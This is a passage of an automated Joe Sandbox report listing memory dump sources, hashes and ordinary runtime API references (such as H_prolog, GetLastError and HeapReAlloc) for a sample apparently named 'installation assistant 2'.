                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            • API String ID: 4194217158-1161259238
                            • Opcode ID: 718e061a29077e29b6de86e339b6d44e29f9fe0b17f9f85d3687f996c468c99d
                            • Instruction ID: 76a54b918b8f7c1167b5f0ba34735a34b980047543981dbf74c1bda2922c8622
                            • Opcode Fuzzy Hash: 718e061a29077e29b6de86e339b6d44e29f9fe0b17f9f85d3687f996c468c99d
                            • Instruction Fuzzy Hash: 965106B29002049FCB14CF68D88069EBBF5FF89314F14856EE8599B351D33AF985CB91
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: CK$CK
                            • API String ID: 3519838083-2096518401
                            APIs
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C0D4C46), ref: 6C0CD58B
                            • __dosmaperr.LIBCMT ref: 6C0CD592
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr
                            • String ID: 8Q
                            • API String ID: 1659562826-4022487301
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0|J$`)L
                            • API String ID: 3519838083-117937767
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$LuJ
                            • API String ID: 3519838083-205571748
                            APIs
                            • _free.LIBCMT ref: 6C0CE2B9
                            • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C0CABAA,?,00000004,?,4B42FCB6,?,?,6C0BFCFC,4B42FCB6,?), ref: 6C0CE2F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: AllocHeap_free
                            • String ID: 8Q
                            • API String ID: 1080816511-4022487301
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: p/K$J
                            • API String ID: 3519838083-2069324279
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C12AFCC
                              • Part of subcall function 6C12A4D1: __EH_prolog.LIBCMT ref: 6C12A4D6
                              • Part of subcall function 6C12914B: __EH_prolog.LIBCMT ref: 6C129150
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J
                            • API String ID: 3519838083-2882003284
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: D)K$H)K$P)K$T)K
                            • API String ID: 0-2262112463
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: (?K$8?K$H?K$CK
                            • API String ID: 0-3450752836